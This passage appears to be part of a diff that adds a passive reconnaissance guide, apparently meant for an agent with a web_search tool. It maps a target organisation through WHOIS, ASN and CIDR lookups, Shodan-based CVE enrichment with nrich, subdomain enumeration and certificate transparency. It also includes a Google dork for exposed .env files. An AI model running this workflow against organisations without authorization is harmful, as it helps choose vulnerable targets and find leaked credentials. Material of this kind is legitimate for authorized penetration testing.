# Find other domains registered with same email:
|
|
172
|
+
web_search("\"registrant@target.com\" whois domains")
|
|
173
|
+
|
|
174
|
+
---
|
|
175
|
+
|
|
176
|
+
## IP Geolocation & ISP Info
|
|
177
|
+
|
|
178
|
+
# ipinfo.io (no API key for basic use):
|
|
179
|
+
curl ipinfo.io/1.2.3.4
|
|
180
|
+
# Returns: ip, city, region, country, org (ISP/ASN), postal, loc (coordinates)
|
|
181
|
+
|
|
182
|
+
# Bulk lookup via web_search:
|
|
183
|
+
web_search("site:ipinfo.io 1.2.3.4")
|
|
184
|
+
|
|
185
|
+
---
|
|
186
|
+
|
|
187
|
+
## Full Passive Recon Workflow
|
|
188
|
+
|
|
189
|
+
# Step 1: Domain → IP → WHOIS
|
|
190
|
+
whois target.com # Registrant info, name servers
|
|
191
|
+
host target.com # A record → main IP
|
|
192
|
+
whois <IP> # CIDR block + org name
|
|
193
|
+
|
|
194
|
+
# Step 2: Org name → ASN → all CIDRs
|
|
195
|
+
asnmap -org "Target Corp" # Or: amass intel -org "Target Corp"
|
|
196
|
+
|
|
197
|
+
# Step 3: CIDRs → all IPs → passive enrichment
|
|
198
|
+
asnmap -a AS12345 | mapcidr -silent > output/all_ips.txt
|
|
199
|
+
cat output/all_ips.txt | nrich - -json > output/nrich_results.json
|
|
200
|
+
# Review: CVEs, open ports, interesting services — without touching a single IP
|
|
201
|
+
|
|
202
|
+
# Step 4: Subdomain enumeration
|
|
203
|
+
subfinder -d target.com -o output/subdomains.txt
|
|
204
|
+
cat output/subdomains.txt | dnsx -a -resp -o output/resolved.txt
|
|
205
|
+
|
|
206
|
+
# Step 5: Enrich resolved IPs
|
|
207
|
+
cat output/resolved.txt | grep -oE '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | \
|
|
208
|
+
sort -u | nrich - -json >> output/nrich_results.json
|
|
209
|
+
|
|
210
|
+
# Step 6: Google dork (see dorking.md)
|
|
211
|
+
web_search("site:target.com")
|
|
212
|
+
web_search("site:target.com filetype:env")
|
|
213
|
+
|
|
214
|
+
---
|
|
215
|
+
|
|
216
|
+
## Pro Tips
|
|
217
|
+
|
|
218
|
+
1. `asnmap -org "Target Corp"` often finds IP ranges the org doesn't publicize — shadow IT
|
|
219
|
+
2. `nrich` is completely passive — queries Shodan's pre-built InternetDB, no active probing
|
|
220
|
+
3. WHOIS admin email pivot often reveals subsidiary domains not linked from main site
|
|
221
|
+
4. Certificate transparency (crt.sh) finds internal/staging subdomains using wildcard certs
|
|
222
|
+
5. BGP data from bgp.he.net shows peering relationships → find CDN/cloud providers used
|
|
223
|
+
6. Always run nrich BEFORE nmap — filter targets by known CVEs to prioritize scanning
|
|
224
|
+
|
|
225
|
+
## Summary
|
|
226
|
+
|
|
227
|
+
Passive infrastructure mapping order:
|
|
228
|
+
1. `whois target.com` → registrant info, name servers
|
|
229
|
+
2. `whois <IP>` → CIDR block, org name
|
|
230
|
+
3. `asnmap -org "Target Corp"` → all ASNs + CIDRs
|
|
231
|
+
4. `mapcidr` + `nrich` → all IPs enriched with CVEs/ports from Shodan InternetDB (no API key)
|
|
232
|
+
5. `subfinder` + `dnsx` → all subdomains resolved
|
|
233
|
+
6. `crt.sh` → certificate transparency for hidden subdomains
|
|
234
|
+
7. Reverse WHOIS on admin email → find related domains
|
|
235
|
+
|
|
236
|
+
Full picture built without sending a single packet to the target.
|